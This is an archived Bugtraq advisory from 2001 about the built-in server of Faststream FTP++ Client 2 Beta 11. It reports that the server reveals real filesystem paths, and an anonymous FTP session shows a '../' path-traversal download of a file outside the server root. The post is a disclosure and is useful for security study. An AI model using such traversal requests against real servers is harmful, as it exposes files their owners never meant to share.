[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability
- Subject: Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability
- From: se00020@LION.CC
- Date: Sun, 4 Mar 2001 16:26:23 -0000
- Approved-By: beng@SECURITYFOCUS.COM
- Delivered-To: bugtraq@lists.securityfocus.com
- Delivered-To: bugtraq@securityfocus.com
- Reply-To: se00020@LION.CC
- Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
Faststram FTP built in server responds with the real
path of directory
instead of a virtual one.It is possible to get files
outside of root.dir.
e:\crap was used as root directory
1. directory path
230 User anonymous logged in.
ftp> pwd
257 "/E:/crap/" is current directory.
2. getting files from outside of root
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29
bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 438 Bytes empfangen in 0,00Sekunden
438000,00KB/s
ftp> get ../test.txt
200 Port command successful.
150 Opening data connection for ../test.txt.
226 File sent ok
FTP: 15 Bytes empfangen in 0,01Sekunden 1,50KB/s
Solution:
no quick fix possible.Use with care.
Author has been contacted on 04.Mar.2001
se00020@fhs-hagenberg.ac.at
se00020@lion.cc
|
